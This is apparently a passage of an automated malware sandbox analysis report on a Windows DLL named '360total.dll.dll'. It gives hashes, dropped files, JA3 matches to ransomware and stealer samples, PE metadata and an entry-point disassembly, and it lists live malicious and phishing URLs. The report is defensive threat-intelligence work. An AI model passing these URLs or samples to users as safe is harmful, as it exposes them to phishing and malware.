	https://c-m-c-group.com/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	https://falic.co/office/office_cookies/main/	Get hash	malicious	Unknown	Browse	172.67.212.156
	https://autode.sk/4bb5BeV	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.27.92
	https://lide.alosalca.fun/highbox#joeblow@xyz.com	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://u18727881.ct.sendgrid.net/ls/click?upn=u001.C98xKppRPMcm9u3MCGfzKZoMS1OpBvTt67698T0dL36uvjeaIcwJCGWCF40JX0jTgfIq_7OnzmxzMpUZLpDhO-2FIQbFKADvzXAOcu2Z6qDokXjolLBB1Q9VRzsF9K8mIjVEFl-2BHay6WBbN5WlzpyVSr4HVkHTzvzCtmwku69-2FJZyLx3-2B4ShTXTnPqinKBtOGbSRbSYGRG3Lt22AUmt-2BZ99sH-2B6Jqf0nt-2BFsnaCp0VSm16eoPdzoH74Sn7jINM2DWCxglARpPWuPOE3iiXY03LGL6ko4g-3D-3D	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://asana.wf	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://url.us.m.mimecastprotect.com/s/qkT5Cv2pWyUOjZODty9fnF?domain=google.com	Get hash	malicious	Unknown	Browse	104.22.75.216
	23-April-24-ACH-29be82ea.jar	Get hash	malicious	Unknown	Browse	172.67.168.231
CLOUDFLARENETUS	https://fusiongsb.com/wofice/	Get hash	malicious	Unknown	Browse	104.21.20.41
	https://c-m-c-group.com/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	https://falic.co/office/office_cookies/main/	Get hash	malicious	Unknown	Browse	172.67.212.156
	https://autode.sk/4bb5BeV	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.27.92
	https://lide.alosalca.fun/highbox#joeblow@xyz.com	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://u18727881.ct.sendgrid.net/ls/click?upn=u001.C98xKppRPMcm9u3MCGfzKZoMS1OpBvTt67698T0dL36uvjeaIcwJCGWCF40JX0jTgfIq_7OnzmxzMpUZLpDhO-2FIQbFKADvzXAOcu2Z6qDokXjolLBB1Q9VRzsF9K8mIjVEFl-2BHay6WBbN5WlzpyVSr4HVkHTzvzCtmwku69-2FJZyLx3-2B4ShTXTnPqinKBtOGbSRbSYGRG3Lt22AUmt-2BZ99sH-2B6Jqf0nt-2BFsnaCp0VSm16eoPdzoH74Sn7jINM2DWCxglARpPWuPOE3iiXY03LGL6ko4g-3D-3D	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://asana.wf	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://url.us.m.mimecastprotect.com/s/qkT5Cv2pWyUOjZODty9fnF?domain=google.com	Get hash	malicious	Unknown	Browse	104.22.75.216
	23-April-24-ACH-29be82ea.jar	Get hash	malicious	Unknown	Browse	172.67.168.231

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.32374.20351.xlsx	Get hash	malicious	Unknown	Browse	172.67.136.103 172.67.219.28
	SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.136.103 172.67.219.28
	ProconGO1121082800.LnK.lnk	Get hash	malicious	Unknown	Browse	172.67.136.103 172.67.219.28
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	172.67.136.103 172.67.219.28
	Version.125.7599.75.js	Get hash	malicious	SocGholish	Browse	172.67.136.103 172.67.219.28
	Database4.exe	Get hash	malicious	Unknown	Browse	172.67.136.103 172.67.219.28
	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.136.103 172.67.219.28
	XV9q6mY4DI.exe	Get hash	malicious	Babuk, Djvu	Browse	172.67.136.103 172.67.219.28
	n8XBpFdVFU.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	172.67.136.103 172.67.219.28
	R5391762lf.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	172.67.136.103 172.67.219.28

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_360_68c96245dd5f839ff441fb79a97a9b35299d069_9cecb875_e8b4a60c-0a4b-406f-b4de-e74f5b66cb69\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8268108967609635
Encrypted:	false
SSDEEP:	96:QdFoL6iMyKyQsj94Rvm7qf8QXIDcQSc6EcEHcw33XaXz+HbHgSQgJjmh88Wpoxmx:A9iMyQH0MA9Tji5zuiFKZ24lO8I
MD5:	CC88FC33C87092CDC3F61D03FC6E8E60
SHA1:	C43AE446F0311D61BEE7B9EFED2660A17A8B5851
SHA-256:	288EAA26169B9B8C7D09F43E47579F1D768E8C51E33F1F9FAAC3DE6B851FFE7F
SHA-512:	88A5D368DC99CCC31A6943BC60C023840EB3911EAD40B6E651C8F325292641E63651E898298E3B40639DFC805879F57863E903B5FF0DE438516FA3B41A279D65
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.5.1.3.8.6.1.8.7.6.5.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.5.1.3.8.6.4.6.8.9.0.1.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.b.4.a.6.0.c.-.0.a.4.b.-.4.0.6.f.-.b.4.d.e.-.e.7.4.f.5.b.6.6.c.b.6.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.3.d.c.8.c.e.0.-.5.c.d.0.-.4.2.d.9.-.8.1.d.e.-.1.f.0.2.f.1.9.0.8.2.8.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.3.6.0.t.o.t.a.l...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.4.-.0.0.0.1.-.0.0.1.4.-.b.2.0.5.-.6.e.2.6.5.1.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_360_f6ce5fb8c554a1c5617cb52ea4bda5a5f52864d1_9cecb875_70d5a318-011b-4b09-9f21-f60ccd1d195e\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8236165350372622
Encrypted:	false
SSDEEP:	96:vbJFpCS6iMyKy/sj94Rvm7qfSQXIDcQYc6DcEZcw3CKXaXz+HbHgSQgJjmh88Wp0:v9DCiMy/J0mHzmAji5zuiFKZ24lO8Iz
MD5:	0D3FD00A2E806F44C712ABB9DF416F6B
SHA1:	874F63016A67FFDE2F460CED038D1F3969D427A1
SHA-256:	A2EDF49B7FA0640A00000F134A21211E203B64C44D78E89B24EB79A13E191C5B
SHA-512:	7616D48FA6CE328626E3B5960B98EC9951530D5773C22BEF4D31989D55F40088545190095A057A6AC5C35A3976AEC9451C1FF86DE8C165CC8AF748D570ED67B8
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.5.1.3.7.6.1.5.1.4.0.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.5.1.3.7.7.0.1.0.8.0.1.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.d.5.a.3.1.8.-.0.1.1.b.-.4.b.0.9.-.9.f.2.1.-.f.6.0.c.c.d.1.d.1.9.5.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.d.4.1.d.3.b.-.d.2.f.c.-.4.c.f.6.-.8.c.4.0.-.b.b.e.9.8.9.a.d.8.7.7.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.3.6.0.t.o.t.a.l...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.4.-.0.0.0.1.-.0.0.1.4.-.b.2.0.5.-.6.e.2.6.5.1.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C76.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Apr 25 20:42:56 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	1.702663610116918
Encrypted:	false
SSDEEP:	192:OJa8En2N3OMkBx2Nb9JqoKs7CSU3h0M6CZ3IElc:ua/n2wNf2NZes1qh0M6CZYe
MD5:	FC3B7E0894086D60FC881221A28B2018
SHA1:	E27E953F03C8C4B057539E82A515E1314FA0470B
SHA-256:	5EF8173CB33A84BAF8980D003B1C24C32733358A803A0DE924FFF85788D9265F
SHA-512:	BEA010F4F6E9DFFD8162E34199D9096B034052CA7C54A26C6F18352D7DA839A73232A3DAB372F577447B4F2667FEB88B4A5D8A47213BEC82952B3D00CD66D2F5
Malicious:	false
Preview:	MDMP..a..... .......P.f.........................................-..........T.......8...........T...............0.......................................................................................................eJ......8.......Lw......................T...........O.f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D80.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8528
Entropy (8bit):	3.6940571803541307
Encrypted:	false
SSDEEP:	192:R6l7wVeJAjSO6YQeyUgmf73e4pr/89bywJfaTmm:R6lXJqSO6Yhpgmf73aymfU
MD5:	09DC1D6CFD74D9D9840A050006D3394D
SHA1:	9B95F8F11E1853487C13BB57ED79C89CECE3D3FE
SHA-256:	05604C4E04A15C6345A7BC784023D1B01D165BF07205D6373DC11D91B9578DF8
SHA-512:	557D58FFC722E5B91BCA5244221D290C809E415F30560DD8A668973EC6820C74DF5C379730A2ACA68CA41C667D29AC1DEE7FB5AC979B58A5926DBBD2ADA5ED6C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DB0.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4763
Entropy (8bit):	4.473336010199298
Encrypted:	false
SSDEEP:	48:cvIwWl8zsKJg771I9zoWpW8VYaYm8M4JCECyfFe9Il1yq85moeptSTS4d:uIjfYI74B7VOJ1l1hpoO4d
MD5:	F3063DEF860857B63F3D8D4BB478A8EC
SHA1:	49BC3C3F45071CDD98E37BE85FD63C6A0112402D
SHA-256:	4771F9E6C84879B80B30E47937711E87D34678B10E142CE2245A10E0595A1955
SHA-512:	0D81333E01CC6AAC12F1E58EBEDA7B96AD4840D3DAEE8264F80799FCACF9CE308EF49D49ED042C3A252DE5F97DFF8301BAD1C741A00C580970D061221D519E46
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="295905" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER93A5.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Apr 25 20:43:06 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	58880
Entropy (8bit):	1.6919640861786223
Encrypted:	false
SSDEEP:	192:wJEaDcEn2YbOMkwpUB9jihfio7CSU3h0M6ZbR5CVh:sEmfn2/NwpUP+hfio1qh0M6Zch
MD5:	C9933C933703AB4DF27D75AEA65974FC
SHA1:	E63C6200E9713E2EC2E56199B87C4F1DAF377EFF
SHA-256:	5FBAD9BDDCACC8B1EAD9E16BA665634ACC47AA527937863A64FFF8A59C66760C
SHA-512:	049A960841AB6E6CA78E0B572E97AD6A2053A8CDBF8BB6B552E7FCCF1076E00D6320E8EE01EB003AE81CAE9DFBC5B81D1F95F2DEFEFFE55E24FA9E31C589F45E
Malicious:	false
Preview:	MDMP..a..... .......Z.f.........................................-..........T.......8...........T...............H.......................................................................................................eJ......8.......Lw......................T...........O.f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9413.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	7000
Entropy (8bit):	3.720984112850451
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbGfjfgUtaY8QPBBXjgaMQUl89b2w4g7ifEASm:R6l7wVeJAjfOY7ZapDl89b2w2fhSm
MD5:	9CE6C5249EF81C2A16C444ABD5E7FEAE
SHA1:	783069A5F9F93FB219DF6E0EA25CAB2DB1A3396F
SHA-256:	ED6E986EED613F762603CBBAF164157B8F6804DBAD9321F82CD42115C7FE03C0
SHA-512:	8EA6A130E06B94A422C80144D66DD9DEB4CE0E0F5C692870CC9933311625F46CB7EE3574BF96864165F7386A2E2C15F4CCD34D9D5C2A56D53B05485DAC414902
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9443.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4764
Entropy (8bit):	4.47030216073724
Encrypted:	false
SSDEEP:	48:cvIwWl8zsKJg771I9zoWpW8VY6Ym8M4JCECyfFZyq85mo2ptSTS5d:uIjfYI74B7VOJvVpoO5d
MD5:	0FC45F00AE23F6C4A2DDCCF3343F467C
SHA1:	9A11C826A212EB85695EB442414877A53A7D3B93
SHA-256:	497D083EB5877CCFE8D5208A53FB5A097993FE2983220CC309EABF02609C16C9
SHA-512:	24BE0608B5BFB300826CE32CAD5A6892D86D7B479DDBD99D25F97353A58A9019EAF194A593667F0ECFEDC50F19A29C339B9B057F4697796A608F94562EE01965
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="295905" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	906752
Entropy (8bit):	6.2833336520446625
Encrypted:	false
SSDEEP:	12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
MD5:	74143402C40AC2E61E9F040A2D7E2D00
SHA1:	4053DC85BB86C47C63F96681D6A62C21CD6342A3
SHA-256:	1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
SHA-512:	4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.Ug.MPf.Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................

C:\Users\user\AppData\Roaming\Custom_update\update_data.dat

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	74
Entropy (8bit):	5.908579547973678
Encrypted:	false
SSDEEP:	3:pZ8L7fSSUsGfzKwfUEInu9r20hgpKVUOn:38L7fohN/9r2u
MD5:	F66F60007362F27534A5E2181AEE8E10
SHA1:	057F9DF7359659A028A3EEE7D83A883B30B9B241
SHA-256:	63B2F94F5ED9B65F1C960BD6AEF53B537150FABD363E668E431F2838AB868E5F
SHA-512:	B056A63EF53A317BE361177178F8E9B5AD48F391AB3C5531323E80B3C098B456B6B807B6CF8AFAE274B3E5D0329A55D70D05CAF944D3ABAEA7E9F36120612085
Malicious:	false
Preview:	.Y.......n.y8.(..>h.......(o.'.3..l.&..O...S-......H.%Sm,.../ST...v0.+

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.42243160157816
Encrypted:	false
SSDEEP:	6144:OSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNa0uhiTw:tvloTMW+EZMM6DFy003w
MD5:	6E6550F7FB3FB7100478A63F954B3C58
SHA1:	2DA543147387B6EDA666A54EFA99B7282375649E
SHA-256:	EA88AC2955BFCD7A6972DE5D50544C8C4A5F33131FA2CA956F8DD1B869C63FFB
SHA-512:	8E3ADAB82CB3B5FA401E1DEED066991966D3D5E01186019B630E1661B914041CF3B48901538EEF1235CE030824CAD09B0AA78C18C6395B26754F5DE5FD410FB5
Malicious:	false
Preview:	regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...&Q...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Entropy (8bit):	6.2833336520446625
TrID:	Win64 Dynamic Link Library (generic) (102004/3) 86.43% Win64 Executable (generic) (12005/4) 10.17% Generic Win/DOS Executable (2004/3) 1.70% DOS Executable Generic (2002/1) 1.70% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:	360total.dll.dll
File size:	906'752 bytes
MD5:	74143402c40ac2e61e9f040a2d7e2d00
SHA1:	4053dc85bb86c47c63f96681d6a62c21cd6342a3
SHA256:	1625ac230aa5ca950573f3ba0b1a7bd4c7fbd3e3686f9ecd4a40f1504bf33a11
SHA512:	4aa55b859f15be8b14c4a0ff6f3971f49b47c1c8c8427f179eb4ab0c76e321441adfd173469facb12aae1e81e25f1328fd621214b42e66f690ba4e9ee1e54cf9
SSDEEP:	12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
TLSH:	B4156B597FB88265C4A7C03A89938A96F3F278411F31D78F4161576E3F3B6B24B29312
File Content Preview:	MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+..f.MPf/$Tg.MPf.Ug.MPf.Tg.MPf/$Ug.MPf.$Ug.MP

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x18006ff60
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x180000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
DLL Characteristics:	HIGH_ENTROPY_VA
Time Stamp:	0x60ED353A [Tue Jul 13 06:39:54 2021 UTC]
TLS Callbacks:	0x800789b0, 0x1
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	908746745c485828202e3664dddf55a1

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec edx
jne 00007F6B507EED0Eh
call 00007F6B507EEDDCh
dec eax
mov dword ptr [0005E66Dh], eax
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+10h], ebx
dec eax
mov dword ptr [eax+18h], ebp
push esi
push edi
inc ecx
push esi
dec eax
sub esp, 20h
dec esp
mov ecx, dword ptr [0005E647h]
inc ebp
xor eax, eax
mov dword ptr [eax+08h], 62756373h
inc esp
mov byte ptr [eax+0Ch], al
dec ecx
arpl word ptr [ecx+3Ch], ax
inc edx
